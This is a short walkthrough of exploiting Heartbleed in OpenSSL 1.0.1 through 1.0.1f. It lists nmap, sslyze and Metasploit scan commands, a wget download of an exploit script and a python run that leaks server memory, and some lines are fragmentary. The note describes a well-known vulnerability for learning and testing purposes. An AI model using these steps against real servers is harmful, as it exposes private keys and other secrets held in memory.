The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

OpenSSL 1.0.1f, 1.0.1e, 1.0.1d, 1.0.1c, 1.0.1b, 1.0.1a, and 1.0.1 are vulnerable.


1. Scan for the vulnerability

  • nmap --script ssl-heartbleed

In this case Nmap shows it is vulnerable

  • sslyze --heartbleed

Sslyze shows it is not vulnerable somehow, this could be an additional test

Running scan with metasploit

  • msfconsole
  • search heartbleed
  • use auxiliary/scanner/ssl/openssl_heartbleed

  • show options
  • set RHOSTS
  • exploit

As it shows vulnerable to ssl-heartbleed we run a python script against it

2. Download the exploit

  • wget
  • ls

3. Running

  • python

  • python heartbleed -n 100

The memory is leaked, we can see there an interesting base64 sting. This like that can come across.

This value can be changed to inspect lager/shorter pieces of memory

  • vi


Updates are available. Please see the references or vendor advisory for more information.